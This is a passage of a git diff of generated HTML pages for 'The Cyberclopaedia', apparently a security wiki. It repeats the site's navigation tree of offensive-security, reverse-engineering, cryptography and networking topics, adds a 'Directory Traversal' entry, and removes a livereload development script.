        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -199,22 +199,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Action Frames.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Action Frames.html index 4c1326f9..c9cff52b 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Action Frames.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Action Frames.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Association Frames.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Association Frames.html index fef1cf89..5f029f7c 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Association Frames.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Management Frames/Association Frames.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
